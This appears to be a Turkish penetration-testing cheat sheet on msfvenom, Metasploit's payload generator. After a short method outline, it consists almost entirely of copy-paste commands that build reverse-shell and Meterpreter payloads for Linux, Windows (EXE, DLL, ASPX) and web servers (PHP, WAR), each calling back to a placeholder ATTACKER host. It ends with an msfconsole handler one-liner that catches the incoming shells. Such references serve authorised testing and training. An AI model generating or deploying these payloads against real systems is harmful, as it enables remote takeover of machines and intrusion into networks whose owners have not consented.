msfvenom
generic difficulty: kolay
msfvenom, Metasploit payload üreticisidir. Mimari, format ve encoder seçimi hedefin OS/AV profiline göre yapılır; handler ile aynı payload ailesi kullanılmalıdır.
Metodoloji
Section titled “Metodoloji”-
Hedef OS/arch seç (
linux/x64,windows/x64, …). -
Format belirle (
elf,exe,dll,aspx,raw…). -
LHOST/LPORT ayarla; çıktıyı transfer et;
multi/handlerile dinle.
Listele
Section titled “Listele”msfvenom -l payloads | rg -i 'reverse_tcp|windows/x64|linux/x64'msfvenom -l formatsmsfvenom -p linux/x64/shell_reverse_tcp LHOST=ATTACKER LPORT=443 -f elf -o rev.elfmsfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=ATTACKER LPORT=443 -f elf -o met.elfWindows
Section titled “Windows”msfvenom -p windows/x64/shell_reverse_tcp LHOST=ATTACKER LPORT=443 -f exe -o rev.exemsfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=ATTACKER LPORT=443 -f exe -o met.exemsfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=ATTACKER LPORT=443 -f dll -o met.dllmsfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=ATTACKER LPORT=443 -f aspx -o shell.aspxWeb / diğer
Section titled “Web / diğer”msfvenom -p php/reverse_php LHOST=ATTACKER LPORT=443 -f raw -o shell.phpmsfvenom -p java/jsp_shell_reverse_tcp LHOST=ATTACKER LPORT=443 -f war -o shell.warHandler
Section titled “Handler”msfconsole -q -x "use exploit/multi/handlerset payload windows/x64/meterpreter/reverse_tcpset LHOST ATTACKERset LPORT 443run"